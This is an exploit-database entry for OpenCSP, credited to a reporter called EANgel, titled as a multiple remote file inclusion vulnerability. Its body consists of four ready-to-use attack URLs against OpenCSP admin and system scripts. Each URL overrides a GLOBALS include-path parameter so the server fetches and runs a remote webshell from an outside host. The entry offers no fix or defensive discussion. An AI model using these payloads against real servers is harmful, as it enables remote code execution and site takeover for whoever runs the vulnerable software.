OpenCSP Multiple Remote File Include Vulnerability

2009-11-25T00:00:00
ID 1337DAY-ID-10018
Type zdt
Reporter EANgel
Modified 2009-11-25T00:00:00

Description

Exploit for unknown platform in category web applications

                                        
                                            ==================================================
OpenCSP Multiple Remote File Include Vulnerability
==================================================


[@]================================================================================================================================================[@]
                          
[+] Location         : notepad                                            
[+] Download Script  : http://sourceforge.net/projects/opencsp/                    
[@]================================================================================================================================================[@]
 
 
 
[@]================================================================================================================================================[@]
[+] 3xpl0it      : http://server/htsystem/admin/client/newClient.php?GLOBALS[OCSP][DEFAULTCONFPATH]=http://example.com/webshell.txt?
[+]                        http://server/htsystem/admin/modules/galerie/index.php?GLOBALS[OCSP][DEFAULTCONFPATH]=http://example.com/webshell.txt?
[+]                        http://server/htsystem/system/calendar.php?GLOBALS[PROJECT][PHPINCPATH]=http://example.com/webshell.txt?
[+]                        http://server/htsystem/system/forms/calendar.php?GLOBALS[PROJECT][PHPINCPATH]=http://example.com/webshell.txt?
[@]================================================================================================================================================[@]



#  0day.today [2018-03-28]  #